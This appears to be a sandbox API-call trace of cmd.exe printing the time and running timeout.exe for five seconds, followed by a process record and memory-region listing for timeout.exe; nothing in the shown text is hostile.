[0080.168] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ceabc, lpData=0x1ceac0, lpcbData=0x1ceab8*=0x1000 | out: lpType=0x1ceabc*=0x4, lpData=0x1ceac0*=0x9, lpcbData=0x1ceab8*=0x4) returned 0x0
[0080.168] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ceabc, lpData=0x1ceac0, lpcbData=0x1ceab8*=0x1000 | out: lpType=0x1ceabc*=0x4, lpData=0x1ceac0*=0x9, lpcbData=0x1ceab8*=0x4) returned 0x0
[0080.168] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ceabc, lpData=0x1ceac0, lpcbData=0x1ceab8*=0x1000 | out: lpType=0x1ceabc*=0x0, lpData=0x1ceac0*=0x9, lpcbData=0x1ceab8*=0x1000) returned 0x2
[0080.168] RegCloseKey (hKey=0x40) returned 0x0
[0080.168] time (in: timer=0x0 | out: timer=0x0) returned 0x5bcd5fac
[0080.168] srand (_Seed=0x5bcd5fac)
[0080.168] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /k echo %time% && timeout 5 > NUL && exit"
[0080.168] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /k echo %time% && timeout 5 > NUL && exit"
[0080.168] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a545260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0080.169] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x201940, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
[0080.169] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a550640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63
[0080.169] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a550640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
[0080.169] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a550640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4
[0080.169] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a550640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0080.169] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a550640, nSize=0x2000 | out: lpBuffer="") returned 0x0
[0080.169] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
[0080.169] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
[0080.169] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
[0080.169] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
[0080.169] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
[0080.169] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
[0080.169] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
[0080.169] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
[0080.169] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf880 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0080.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x1cf880, lpFilePart=0x1cf87c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1cf87c*="system32") returned 0x13
[0080.169] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10
[0080.170] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x1cf5fc | out: lpFindFileData=0x1cf5fc) returned 0x201b50
[0080.170] FindClose (in: hFindFile=0x201b50 | out: hFindFile=0x201b50) returned 1
[0080.170] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x1cf5fc | out: lpFindFileData=0x1cf5fc) returned 0x201b50
[0080.170] FindClose (in: hFindFile=0x201b50 | out: hFindFile=0x201b50) returned 1
[0080.170] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10
[0080.170] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1
[0080.170] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1
[0080.170] GetEnvironmentStringsW () returned 0x200108*
[0080.170] FreeEnvironmentStringsW (penv=0x200108) returned 1
[0080.170] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a545260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0080.171] GetConsoleOutputCP () returned 0x1b5
[0080.171] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a544260 | out: lpCPInfo=0x4a544260) returned 1
[0080.171] GetUserDefaultLCID () returned 0x409
[0080.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a544950, cchData=8 | out: lpLCData=":") returned 2
[0080.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf9c0, cchData=128 | out: lpLCData="0") returned 2
[0080.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf9c0, cchData=128 | out: lpLCData="0") returned 2
[0080.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf9c0, cchData=128 | out: lpLCData="1") returned 2
[0080.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a544940, cchData=8 | out: lpLCData="/") returned 2
[0080.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a544d80, cchData=32 | out: lpLCData="Mon") returned 4
[0080.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a544d40, cchData=32 | out: lpLCData="Tue") returned 4
[0080.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a544d00, cchData=32 | out: lpLCData="Wed") returned 4
[0080.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a544cc0, cchData=32 | out: lpLCData="Thu") returned 4
[0080.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a544c80, cchData=32 | out: lpLCData="Fri") returned 4
[0080.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a544c40, cchData=32 | out: lpLCData="Sat") returned 4
[0080.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a544c00, cchData=32 | out: lpLCData="Sun") returned 4
[0080.172] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a544930, cchData=8 | out: lpLCData=".") returned 2
[0080.172] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a544920, cchData=8 | out: lpLCData=",") returned 2
[0080.172] setlocale (category=0, locale=".OCP") returned="English_United States.437"
[0080.174] GetConsoleTitleW (in: lpConsoleTitle=0x200170, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0080.174] _get_osfhandle (_FileHandle=1) returned 0x7
[0080.174] GetFileType (hFile=0x7) returned 0x2
[0080.174] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0080.174] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cfabc | out: lpMode=0x1cfabc) returned 1
[0080.174] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0080.174] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1cfad8 | out: lpConsoleScreenBufferInfo=0x1cfad8) returned 1
[0080.174] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0080.174] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1cfaa4 | out: lpConsoleScreenBufferInfo=0x1cfaa4) returned 1
[0080.175] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x1cfabc | out: lpNumberOfAttrsWritten=0x1cfabc) returned 1
[0080.175] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0080.175] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75370000
[0080.175] GetProcAddress (hModule=0x75370000, lpProcName="CopyFileExW") returned 0x753aac6c
[0080.175] GetProcAddress (hModule=0x75370000, lpProcName="IsDebuggerPresent") returned 0x753b3ea8
[0080.175] GetProcAddress (hModule=0x75370000, lpProcName="SetConsoleInputExeNameW") returned 0x753c2732
[0080.176] GetEnvironmentVariableW (in: lpName="time", lpBuffer=0x4a550640, nSize=0x2000 | out: lpBuffer="") returned 0x0
[0080.176] _wcsicmp (_String1="time", _String2="CD") returned 17
[0080.176] _wcsicmp (_String1="time", _String2="ERRORLEVEL") returned 15
[0080.176] _wcsicmp (_String1="time", _String2="CMDEXTVERSION") returned 17
[0080.177] _wcsicmp (_String1="time", _String2="CMDCMDLINE") returned 17
[0080.177] _wcsicmp (_String1="time", _String2="DATE") returned 16
[0080.177] _wcsicmp (_String1="time", _String2="TIME") returned 0
[0080.177] GetSystemTime (in: lpSystemTime=0x1cf8ac | out: lpSystemTime=0x1cf8ac*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x1, wDay=0x16, wHour=0x5, wMinute=0x1b, wSecond=0x8, wMilliseconds=0x1a9))
[0080.177] SystemTimeToFileTime (in: lpSystemTime=0x1cf8ac, lpFileTime=0x1cf8a0 | out: lpFileTime=0x1cf8a0) returned 1
[0080.177] FileTimeToLocalFileTime (in: lpFileTime=0x1cf8a0, lpLocalFileTime=0x1cf898 | out: lpLocalFileTime=0x1cf898) returned 1
[0080.177] FileTimeToSystemTime (in: lpFileTime=0x1cf898, lpSystemTime=0x1cf8ac | out: lpSystemTime=0x1cf8ac) returned 1
[0080.177] _vsnwprintf (in: _Buffer=0x4a550640, _BufferCount=0x1fff, _Format="%2d%s%02d%s%02d%s%02d", _ArgList=0x1cf874 | out: _Buffer=" 3:27:08.42") returned 11
[0080.177] _wcsicmp (_String1="echo", _String2=")") returned 60
[0080.177] _wcsicmp (_String1="FOR", _String2="echo") returned 1
[0080.177] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1
[0080.177] _wcsicmp (_String1="IF", _String2="echo") returned 4
[0080.177] _wcsicmp (_String1="IF/?", _String2="echo") returned 4
[0080.177] _wcsicmp (_String1="REM", _String2="echo") returned 13
[0080.177] _wcsicmp (_String1="REM/?", _String2="echo") returned 13
[0080.179] _wcsicmp (_String1="FOR", _String2="timeout") returned -14
[0080.180] _wcsicmp (_String1="FOR/?", _String2="timeout") returned -14
[0080.180] _wcsicmp (_String1="IF", _String2="timeout") returned -11
[0080.180] _wcsicmp (_String1="IF/?", _String2="timeout") returned -11
[0080.180] _wcsicmp (_String1="REM", _String2="timeout") returned -2
[0080.180] _wcsicmp (_String1="REM/?", _String2="timeout") returned -2
[0080.182] _wcsicmp (_String1="FOR", _String2="exit") returned 1
[0080.182] _wcsicmp (_String1="FOR/?", _String2="exit") returned 1
[0080.182] _wcsicmp (_String1="IF", _String2="exit") returned 4
[0080.182] _wcsicmp (_String1="IF/?", _String2="exit") returned 4
[0080.182] _wcsicmp (_String1="REM", _String2="exit") returned 13
[0080.182] _wcsicmp (_String1="REM/?", _String2="exit") returned 13
[0080.183] GetConsoleTitleW (in: lpConsoleTitle=0x1cf654, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0080.183] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0080.183] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0080.183] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0080.183] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0080.183] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0080.183] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0080.183] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0080.183] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0080.183] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0080.183] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0080.185] GetConsoleTitleW (in: lpConsoleTitle=0x200680, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0080.185] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\System32\\cmd.exe - echo 3:27:08.42 ") returned 1
[0080.186] _vsnwprintf (in: _Buffer=0x4a554640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1cf61c | out: _Buffer=" 3:27:08.42 \r\n") returned 14
[0080.186] _get_osfhandle (_FileHandle=1) returned 0x7
[0080.186] GetFileType (hFile=0x7) returned 0x2
[0080.187] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0080.187] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf5dc | out: lpMode=0x1cf5dc) returned 1
[0080.187] _get_osfhandle (_FileHandle=1) returned 0x7
[0080.187] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a554640*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0x1cf608, lpReserved=0x0 | out: lpBuffer=0x4a554640*, lpNumberOfCharsWritten=0x1cf608*=0xe) returned 1
[0080.187] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 1
[0080.188] _get_osfhandle (_FileHandle=1) returned 0x7
[0080.188] _get_osfhandle (_FileHandle=1) returned 0x7
[0080.188] _get_osfhandle (_FileHandle=1) returned 0x7
[0080.188] GetFileType (hFile=0x7) returned 0x2
[0080.188] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0080.188] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf7f0 | out: lpMode=0x1cf7f0) returned 1
[0080.188] _dup (_FileHandle=1) returned 3
[0080.189] _close (_FileHandle=1) returned 0
[0080.189] _wcsicmp (_String1="NUL", _String2="con") returned 11
[0080.189] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1cf7c0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c
[0080.189] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1
[0080.189] GetConsoleTitleW (in: lpConsoleTitle=0x1cf5f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0080.190] _wcsicmp (_String1="timeout", _String2="DIR") returned 16
[0080.190] _wcsicmp (_String1="timeout", _String2="ERASE") returned 15
[0080.190] _wcsicmp (_String1="timeout", _String2="DEL") returned 16
[0080.190] _wcsicmp (_String1="timeout", _String2="TYPE") returned -16
[0080.190] _wcsicmp (_String1="timeout", _String2="COPY") returned 17
[0080.190] _wcsicmp (_String1="timeout", _String2="CD") returned 17
[0080.190] _wcsicmp (_String1="timeout", _String2="CHDIR") returned 17
[0080.190] _wcsicmp (_String1="timeout", _String2="RENAME") returned 2
[0080.190] _wcsicmp (_String1="timeout", _String2="REN") returned 2
[0080.190] _wcsicmp (_String1="timeout", _String2="ECHO") returned 15
[0080.190] _wcsicmp (_String1="timeout", _String2="SET") returned 1
[0080.190] _wcsicmp (_String1="timeout", _String2="PAUSE") returned 4
[0080.190] _wcsicmp (_String1="timeout", _String2="DATE") returned 16
[0080.190] _wcsicmp (_String1="timeout", _String2="TIME") returned 111
[0080.190] _wcsicmp (_String1="timeout", _String2="PROMPT") returned 4
[0080.190] _wcsicmp (_String1="timeout", _String2="MD") returned 7
[0080.190] _wcsicmp (_String1="timeout", _String2="MKDIR") returned 7
[0080.190] _wcsicmp (_String1="timeout", _String2="RD") returned 2
[0080.190] _wcsicmp (_String1="timeout", _String2="RMDIR") returned 2
[0080.190] _wcsicmp (_String1="timeout", _String2="PATH") returned 4
[0080.190] _wcsicmp (_String1="timeout", _String2="GOTO") returned 13
[0080.190] _wcsicmp (_String1="timeout", _String2="SHIFT") returned 1
[0080.190] _wcsicmp (_String1="timeout", _String2="CLS") returned 17
[0080.191] _wcsicmp (_String1="timeout", _String2="CALL") returned 17
[0080.191] _wcsicmp (_String1="timeout", _String2="VERIFY") returned -2
[0080.191] _wcsicmp (_String1="timeout", _String2="VER") returned -2
[0080.191] _wcsicmp (_String1="timeout", _String2="VOL") returned -2
[0080.191] _wcsicmp (_String1="timeout", _String2="EXIT") returned 15
[0080.191] _wcsicmp (_String1="timeout", _String2="SETLOCAL") returned 1
[0080.191] _wcsicmp (_String1="timeout", _String2="ENDLOCAL") returned 15
[0080.191] _wcsicmp (_String1="timeout", _String2="TITLE") returned -7
[0080.191] _wcsicmp (_String1="timeout", _String2="START") returned 1
[0080.191] _wcsicmp (_String1="timeout", _String2="DPATH") returned 16
[0080.191] _wcsicmp (_String1="timeout", _String2="KEYS") returned 9
[0080.191] _wcsicmp (_String1="timeout", _String2="MOVE") returned 7
[0080.191] _wcsicmp (_String1="timeout", _String2="PUSHD") returned 4
[0080.191] _wcsicmp (_String1="timeout", _String2="POPD") returned 4
[0080.191] _wcsicmp (_String1="timeout", _String2="ASSOC") returned 19
[0080.191] _wcsicmp (_String1="timeout", _String2="FTYPE") returned 14
[0080.191] _wcsicmp (_String1="timeout", _String2="BREAK") returned 18
[0080.191] _wcsicmp (_String1="timeout", _String2="COLOR") returned 17
[0080.191] _wcsicmp (_String1="timeout", _String2="MKLINK") returned 7
[0080.191] _wcsicmp (_String1="timeout", _String2="DIR") returned 16
[0080.191] _wcsicmp (_String1="timeout", _String2="ERASE") returned 15
[0080.191] _wcsicmp (_String1="timeout", _String2="DEL") returned 16
[0080.191] _wcsicmp (_String1="timeout", _String2="TYPE") returned -16
[0080.191] _wcsicmp (_String1="timeout", _String2="COPY") returned 17
[0080.191] _wcsicmp (_String1="timeout", _String2="CD") returned 17
[0080.191] _wcsicmp (_String1="timeout", _String2="CHDIR") returned 17
[0080.191] _wcsicmp (_String1="timeout", _String2="RENAME") returned 2
[0080.191] _wcsicmp (_String1="timeout", _String2="REN") returned 2
[0080.191] _wcsicmp (_String1="timeout", _String2="ECHO") returned 15
[0080.191] _wcsicmp (_String1="timeout", _String2="SET") returned 1
[0080.192] _wcsicmp (_String1="timeout", _String2="PAUSE") returned 4
[0080.192] _wcsicmp (_String1="timeout", _String2="DATE") returned 16
[0080.192] _wcsicmp (_String1="timeout", _String2="TIME") returned 111
[0080.192] _wcsicmp (_String1="timeout", _String2="PROMPT") returned 4
[0080.192] _wcsicmp (_String1="timeout", _String2="MD") returned 7
[0080.192] _wcsicmp (_String1="timeout", _String2="MKDIR") returned 7
[0080.192] _wcsicmp (_String1="timeout", _String2="RD") returned 2
[0080.192] _wcsicmp (_String1="timeout", _String2="RMDIR") returned 2
[0080.192] _wcsicmp (_String1="timeout", _String2="PATH") returned 4
[0080.192] _wcsicmp (_String1="timeout", _String2="GOTO") returned 13
[0080.192] _wcsicmp (_String1="timeout", _String2="SHIFT") returned 1
[0080.192] _wcsicmp (_String1="timeout", _String2="CLS") returned 17
[0080.192] _wcsicmp (_String1="timeout", _String2="CALL") returned 17
[0080.192] _wcsicmp (_String1="timeout", _String2="VERIFY") returned -2
[0080.192] _wcsicmp (_String1="timeout", _String2="VER") returned -2
[0080.192] _wcsicmp (_String1="timeout", _String2="VOL") returned -2
[0080.192] _wcsicmp (_String1="timeout", _String2="EXIT") returned 15
[0080.192] _wcsicmp (_String1="timeout", _String2="SETLOCAL") returned 1
[0080.192] _wcsicmp (_String1="timeout", _String2="ENDLOCAL") returned 15
[0080.192] _wcsicmp (_String1="timeout", _String2="TITLE") returned -7
[0080.192] _wcsicmp (_String1="timeout", _String2="START") returned 1
[0080.192] _wcsicmp (_String1="timeout", _String2="DPATH") returned 16
[0080.192] _wcsicmp (_String1="timeout", _String2="KEYS") returned 9
[0080.192] _wcsicmp (_String1="timeout", _String2="MOVE") returned 7
[0080.192] _wcsicmp (_String1="timeout", _String2="PUSHD") returned 4
[0080.192] _wcsicmp (_String1="timeout", _String2="POPD") returned 4
[0080.192] _wcsicmp (_String1="timeout", _String2="ASSOC") returned 19
[0080.192] _wcsicmp (_String1="timeout", _String2="FTYPE") returned 14
[0080.192] _wcsicmp (_String1="timeout", _String2="BREAK") returned 18
[0080.192] _wcsicmp (_String1="timeout", _String2="COLOR") returned 17
[0080.193] _wcsicmp (_String1="timeout", _String2="MKLINK") returned 7
[0080.193] _wcsicmp (_String1="timeout", _String2="FOR") returned 14
[0080.193] _wcsicmp (_String1="timeout", _String2="IF") returned 11
[0080.193] _wcsicmp (_String1="timeout", _String2="REM") returned 2
[0080.193] _wcsnicmp (_String1="time", _String2="cmd ", _MaxCount=0x4) returned 17
[0080.194] SetErrorMode (uMode=0x0) returned 0x0
[0080.194] SetErrorMode (uMode=0x1) returned 0x0
[0080.194] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x201b58, lpFilePart=0x1cf110 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1cf110*="system32") returned 0x13
[0080.194] SetErrorMode (uMode=0x0) returned 0x1
[0080.194] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a550640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63
[0080.194] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0080.201] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\timeout.*", fInfoLevelId=0x1, lpFindFileData=0x1cee8c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cee8c) returned 0x201e28
[0080.201] FindClose (in: hFindFile=0x201e28 | out: hFindFile=0x201e28) returned 1
[0080.201] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\timeout.COM", fInfoLevelId=0x1, lpFindFileData=0x1cee8c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cee8c) returned 0xffffffff
[0080.201] GetLastError () returned 0x2
[0080.201] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\timeout.EXE", fInfoLevelId=0x1, lpFindFileData=0x1cee8c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cee8c) returned 0x201e28
[0080.201] FindClose (in: hFindFile=0x201e28 | out: hFindFile=0x201e28) returned 1
[0080.202] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
[0080.202] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
[0080.202] GetConsoleTitleW (in: lpConsoleTitle=0x1cf384, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0080.202] GetConsoleTitleW (in: lpConsoleTitle=0x201e30, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0080.202] SetConsoleTitleW (lpConsoleTitle="timeout 5 ") returned 1
[0080.203] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf20c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf2d4 | out: lpAttributeList=0x1cf20c, lpSize=0x1cf2d4) returned 1
[0080.203] UpdateProcThreadAttribute (in: lpAttributeList=0x1cf20c, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf2cc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cf20c, lpPreviousValue=0x0) returned 1
[0080.203] GetStartupInfoW (in: lpStartupInfo=0x1cf1c8 | out: lpStartupInfo=0x1cf1c8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x80000000, hStdOutput=0x201e20, hStdError=0x1cf2f8))
Process:
id = "23"
image_name = "timeout.exe"
filename = "c:\\windows\\system32\\timeout.exe"
page_root = "0x7f1be3a0"
os_pid = "0xed8"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "22"
os_parent_pid = "0xec0"
cmd_line = "timeout 5 "
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2167
start_va = 0x10000
end_va = 0x13fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2168
start_va = 0x20000
end_va = 0x29fff
entry_point = 0x20000
region_type = mapped_file
name = "timeout.exe"
filename = "\\Windows\\System32\\timeout.exe" (normalized: "c:\\windows\\system32\\timeout.exe")
Region:
id = 2169
start_va = 0x30000
end_va = 0x4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 2170
start_va = 0x50000
end_va = 0x50fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 2171
start_va = 0x130000
end_va = 0x16ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000130000"
filename = ""
Region:
id = 2172
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2173
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2174
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 2175
start_va = 0x7ffd6000
end_va = 0x7ffd6fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd6000"
filename = ""
Region:
id = 2176
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 2177
start_va = 0x30000
end_va = 0x3ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2178
start_va = 0x40000
end_va = 0x4ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2179
start_va = 0x60000
end_va = 0xc6fff
entry_point = 0x60000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2180
start_va = 0x190000
end_va = 0x28ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 2181
start_va = 0x3f0000
end_va = 0x3fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2182
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 2183
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2184
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2185
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2186
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 2187
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2188
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
